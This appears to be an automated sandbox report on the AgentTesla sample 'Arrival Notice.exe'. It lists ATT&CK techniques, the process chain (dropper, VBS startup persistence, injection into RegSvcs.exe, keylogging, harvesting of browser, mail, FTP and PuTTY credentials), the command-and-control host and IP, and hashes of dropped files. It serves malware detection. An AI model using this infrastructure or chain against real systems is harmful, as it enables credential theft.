                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3632, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00946596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00946596
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00946A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00946A5A
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00226596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00226596
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00226A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00226A5A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting
                    2
                    Valid Accounts
                    121
                    Windows Management Instrumentation
                    111
                    Scripting
                    1
                    Exploitation for Privilege Escalation
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    221
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts
                    2
                    Valid Accounts
                    2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    3
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder
                    21
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    NTDS138
                    System Information Discovery
                    Distributed Component Object Model221
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection
                    11
                    Masquerading
                    LSA Secrets341
                    Security Software Discovery
                    SSH4
                    Clipboard Data
                    23
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Registry Run Keys / Startup Folder
                    2
                    Valid Accounts
                    Cached Domain Credentials121
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
                    Virtualization/Sandbox Evasion
                    DCSync2
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467213 Sample: Arrival Notice.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 30 mail.mahesh-ent.com 2->30 32 api.ipify.org 2->32 38 Snort IDS alert for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 10 other signatures 2->44 8 Arrival Notice.exe 6 2->8         started        12 wscript.exe 1 2->12         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\name.exe, PE32 8->26 dropped 58 Binary is likely a compiled AutoIt script file 8->58 14 name.exe 3 8->14         started        60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->60 18 name.exe 2 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\Roaming\...\name.vbs, data 14->28 dropped 62 Multi AV Scanner detection for dropped file 14->62 64 Binary is likely a compiled AutoIt script file 14->64 66 Machine Learning detection for dropped file 14->66 72 2 other signatures 14->72 20 RegSvcs.exe 15 2 14->20         started        68 Writes to foreign memory regions 18->68 70 Maps a DLL or memory area into another process 18->70 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 34 mail.mahesh-ent.com 148.66.136.151, 49700, 49702, 49709 AS-26496-GO-DADDY-COM-LLCUS Singapore 20->34 36 api.ipify.org 104.26.12.205, 443, 49699, 49701 CLOUDFLARENETUS United States 20->36 46 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->46 48 Installs a global keyboard hook 20->48 50 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->50 52 Tries to steal Mail credentials (via file / registry access) 24->52 54 Tries to harvest and steal ftp login credentials 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Arrival Notice.exe63%ReversingLabsWin32.Trojan.Strab
                    Arrival Notice.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\directory\name.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\directory\name.exe63%ReversingLabsWin32.Trojan.Strab
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    https://api.ipify.org/t0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.microsoft.c0%Avira URL Cloudsafe
                    http://mail.mahesh-ent.com0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    104.26.12.205
                    truefalse
                      unknown
                      mail.mahesh-ent.com
                      148.66.136.151
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                        • URL Reputation: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://mail.mahesh-ent.comRegSvcs.exe, 00000003.00000002.2226892130.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002D42000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002B29000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.0000000002E54000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.ipify.orgname.exe, 00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2226892130.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2224272082.0000000000402000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000005.00000002.2225248989.0000000003950000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.000000000295C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.microsoft.cRegSvcs.exe, 00000006.00000002.4537874564.0000000005CF2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://account.dyn.com/name.exe, 00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2224272082.0000000000402000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000005.00000002.2225248989.0000000003950000.00000004.00001000.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://api.ipify.org/tRegSvcs.exe, 00000003.00000002.2226892130.0000000002E21000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.2226892130.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4531977929.000000000295C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        148.66.136.151
                        mail.mahesh-ent.comSingapore
                        26496AS-26496-GO-DADDY-COM-LLCUStrue
                        104.26.12.205
                        api.ipify.orgUnited States
                        13335CLOUDFLARENETUSfalse
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1467213
                        Start date and time:2024-07-03 21:16:08 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 23s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Arrival Notice.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 59
                        • Number of non-executed functions: 274
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • VT rate limit hit for: Arrival Notice.exe
                        TimeTypeDescription
                        15:16:57API Interceptor10559185x Sleep call for process: RegSvcs.exe modified
                        21:16:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        148.66.136.151arrival notice.exeGet hashmaliciousAgentTeslaBrowse
                          LOADING ADVICE.exeGet hashmaliciousAgentTeslaBrowse
                            SOA.exeGet hashmaliciousAgentTeslaBrowse
                              loading advice.exeGet hashmaliciousAgentTeslaBrowse
                                loading advice..exeGet hashmaliciousAgentTeslaBrowse
                                  Order of CTS-SFCS-104.exeGet hashmaliciousAgentTeslaBrowse
                                    Order of CTS-SFCS-104.exeGet hashmaliciousAgentTeslaBrowse
                                      SecuriteInfo.com.Trojan.PackedNET.2926.9666.23696.exeGet hashmaliciousAgentTeslaBrowse
                                        SALES CONTRACT (DRAFT).exeGet hashmaliciousAgentTeslaBrowse
                                          Drawing and specification.exeGet hashmaliciousAgentTeslaBrowse
                                            104.26.12.205SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exeGet hashmaliciousConti, PureLog Stealer, Targeted RansomwareBrowse
                                            • api.ipify.org/
                                            482730621.exeGet hashmaliciousStealitBrowse
                                            • api.ipify.org/?format=json
                                            482730621.exeGet hashmaliciousStealitBrowse
                                            • api.ipify.org/?format=json
                                            Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                            • api.ipify.org/?format=json
                                            Sky-Beta.exeGet hashmaliciousStealitBrowse
                                            • api.ipify.org/?format=json
                                            SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                            • api.ipify.org/
                                            lods.cmdGet hashmaliciousRemcosBrowse
                                            • api.ipify.org/
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            mail.mahesh-ent.comarrival notice.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            LOADING ADVICE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            SOA.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            loading advice.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            loading advice..exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            Order of CTS-SFCS-104.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            Order of CTS-SFCS-104.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            SecuriteInfo.com.Trojan.PackedNET.2926.9666.23696.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            SALES CONTRACT (DRAFT).exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            Drawing and specification.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            api.ipify.orgrnoahcrypter.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 104.26.13.205
                                            tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 104.26.13.205
                                            19808bS58f.exeGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152
                                            SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.13.205
                                            9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 172.67.74.152
                                            0VcrCVxnMP.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 172.67.74.152
                                            E48ALuMJ3m.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 104.26.13.205
                                            MzjwuZnJF0.exeGet hashmaliciousGuLoaderBrowse
                                            • 104.26.12.205
                                            VG0x1LZCFb.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.13.205
                                            q7r87KTHbc.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.13.205
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUSRemittanceCopy389.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.24.14
                                            https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                            • 104.17.2.184
                                            http://sagilityhealth.comGet hashmaliciousUnknownBrowse
                                            • 104.22.70.197
                                            https://hr.economictimes.indiatimes.com/etl.php?url=//uiytrewrtyuiouyt.pages.dev/Get hashmaliciousUnknownBrowse
                                            • 188.114.96.3
                                            https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3A%2F%2Flodgesonvashon.us11.list-manage.com%2Ftrack%2Fclick%3Fu%3D7bd9671a0b3250a7fef40b908%26id%3Dd8775abc58%26e%3D176d192631&umid=dd8a56c0-7dd4-4bb3-bb0e-81b56ebc53fa&auth=f59947c46ffdca8529044338828c8694fe545b0c-e8ce5e3cd8a069926d864ab292898eb1f0993e46Get hashmaliciousUnknownBrowse
                                            • 172.67.190.237
                                            https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3A%2F%2Flodgesonvashon.us11.list-manage.com%2Ftrack%2Fclick%3Fu%3D7bd9671a0b3250a7fef40b908%26id%3Dd8775abc58%26e%3D176d192631&umid=dd8a56c0-7dd4-4bb3-bb0e-81b56ebc53fa&auth=f59947c46ffdca8529044338828c8694fe545b0c-e8ce5e3cd8a069926d864ab292898eb1f0993e46Get hashmaliciousHTMLPhisherBrowse
                                            • 172.67.190.237
                                            23eb97f4-980c-745d-c5e2-6fdb70189e48.emlGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.2.184
                                            https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//uiytrewrtyuiouyt.pages.dev/#?email=a2V2aW4uai5oYW5zZW5AeGNlbGVuZXJneS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                            • 104.17.2.184
                                            https://truecommerceedi-my.sharepoint.com/:o:/g/personal/doug_linek_truecommerce_com/EiyWH-QHx4BNkzCWTtkFfUIB_LOEdcSk9TIJqvvJ9XzR1g?e=5%3aMKiHAE&at=9Get hashmaliciousHTMLPhisherBrowse
                                            • 1.1.1.1
                                            payment.htmlGet hashmaliciousPhisherBrowse
                                            • 188.114.96.3
                                            AS-26496-GO-DADDY-COM-LLCUSAtt00173994.exeGet hashmaliciousFormBookBrowse
                                            • 198.12.241.35
                                            https://newhomeagent.org/oldrealtor/empty/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 132.148.176.65
                                            https://83.57.205.92.host.secureserver.net/facdigitalweb?contacto/?utm_source=mail;amp;utm_medium=customer;amp;utm_campaign=FOL_Medios_de_contactoGet hashmaliciousHTMLPhisherBrowse
                                            • 208.109.213.188
                                            arrival notice.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                                            • 107.180.58.64
                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                                            • 107.180.58.64
                                            16bfcGvz5N.elfGet hashmaliciousUnknownBrowse
                                            • 166.62.3.68
                                            Att0027592.exeGet hashmaliciousFormBookBrowse
                                            • 198.12.241.35
                                            SR9qYL1hLF.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 132.148.33.153
                                            V7UaNBrX72.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 192.169.229.193
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                            • 104.26.12.205
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 104.26.12.205
                                            http://yournewstech.comGet hashmaliciousUnknownBrowse
                                            • 104.26.12.205
                                            PFbc2O8eXUJp.zipGet hashmaliciousUnknownBrowse
                                            • 104.26.12.205
                                            https://www.bnaminexg.com/Invoice-yetdr.zipGet hashmaliciousUnknownBrowse
                                            • 104.26.12.205
                                            rnoahcrypter.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 104.26.12.205
                                            2cFFfHDG7D.msiGet hashmaliciousAteraAgentBrowse
                                            • 104.26.12.205
                                            thegreatestexecutor.batGet hashmaliciousUnknownBrowse
                                            • 104.26.12.205
                                            Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                            • 104.26.12.205
                                            #Uc804#Uc790(#Uc138#Uae08)#Uacc4#Uc0b0#Uc11c 2024-06-20.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 104.26.12.205
                                            No context
                                            Process:C:\Users\user\Desktop\Arrival Notice.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):149320
                                            Entropy (8bit):7.8836938731943365
                                            Encrypted:false
                                            SSDEEP:3072:SwI8/QD3R12aQgtBw9iKH5DYH7PBU1VUU7lAUnHj3+BEwkVbSH2P7X7Z:SwIDD3R12+S9dZEMlAUHld
                                            MD5:298BBF26B85A7A461A022D093B4C93A9
                                            SHA1:9670B8099FD6042CB27AC2132D8D147D37A1AAB3
                                            SHA-256:CEF00C162693E7288D3558531670672DEE84C7839B54CD68B6ADD9EC7D6CFF40
                                            SHA-512:D7FAF2B895A97FA3B13602095630473D209A10B698BB9D3CA97A5EF3D3CDA2B0694C27376E531C8637BE7651C69C24EEAB5A04380F6B7BB84C05EDFFCBCB7173
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06.....C9T.>.L.S.s~F.R..TZMZ.M......BoO.T.......|\..B}P......-...V.4.A%.OhR....#..*..$.wj.H-2I|.!&../...^. .M.4z.>....D..7..5..f.#.d.b.Q.O)...?.Q..k....a..y........h.6ao..).9...34...[..y.4.S...k.0..i.....Z........#...F...<u.je.........O..S...&.....T...Gl3..z.P}<.`.@.P..jT.@......V..o*.....C\..R@..5D.....Q+..o).MkT....@A/..G.......jH.....&T..2....w.]J..(R*.X....).W...|.W....G.R3.....4..k?...y..E...]o....+.m..9..O...[.B.{.{../E...u.T...c...D..=.I.....W..q;....9.A>....S..y......a._..u...o...F%..O..IT.oc......V.....#QD..z;.6{;..hk.x.".I...I.o7..`a..].9.... .......d.......H...8..N..(.....P......B*.(U@......x.uZ.......:.......xs._.M...........Be.,>.%2.A.qZ..AA..h..4Wm..q....O..R.p.\.mI.U....k.A..l..uJ....uF.w.C...u..i.b <.F.....#..<.....d.. s.U-.....9.2.;Y7......+.E.N'r...8..5*$.M$.Z.Q........b.H...h.....k.uf;..D*T.v..Y.V....!!0......N.J.."Uj.&5......).T.t..Z.V.S.[...qN..!..URe/../.J}.h.xY.3Y..b..^!..Mj.:. '4.d..N.k)...-V.Q...-"q...f..N...F...l.
                                            Process:C:\Users\user\Desktop\Arrival Notice.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):9842
                                            Entropy (8bit):7.596876375424286
                                            Encrypted:false
                                            SSDEEP:192:65jwEiqxwzMZTG3cL8Z1KDS7kPgKnVx00uYsLLZbku5nDkUcS:I6qxwzMZy3kDS7kPgKD8BLdIakQ
                                            MD5:BEDFA8109472436EFCDDCC5DB4B355FD
                                            SHA1:AA532618BA72610E2B3C4C3F0DC75E2C5C13463F
                                            SHA-256:24BD552677A47E0DC827BB9E19FF928BDCA606DDAC6B96A2744AD45DCCD4E73C
                                            SHA-512:910F6D68460E42162CCA8BA892499ECB5EB911D3B6366DEA0837F2A38597A78E58E95D99FE79E9F51A24DCE5F768C53947CE370C684FFBDACF5156512C82FDBE
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@
                                            Process:C:\Users\user\AppData\Local\directory\name.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):149320
                                            Entropy (8bit):7.8836938731943365
                                            Encrypted:false
                                            SSDEEP:3072:SwI8/QD3R12aQgtBw9iKH5DYH7PBU1VUU7lAUnHj3+BEwkVbSH2P7X7Z:SwIDD3R12+S9dZEMlAUHld
                                            MD5:298BBF26B85A7A461A022D093B4C93A9
                                            SHA1:9670B8099FD6042CB27AC2132D8D147D37A1AAB3
                                            SHA-256:CEF00C162693E7288D3558531670672DEE84C7839B54CD68B6ADD9EC7D6CFF40
                                            SHA-512:D7FAF2B895A97FA3B13602095630473D209A10B698BB9D3CA97A5EF3D3CDA2B0694C27376E531C8637BE7651C69C24EEAB5A04380F6B7BB84C05EDFFCBCB7173
                                            Malicious:false
                                            Reputation:low
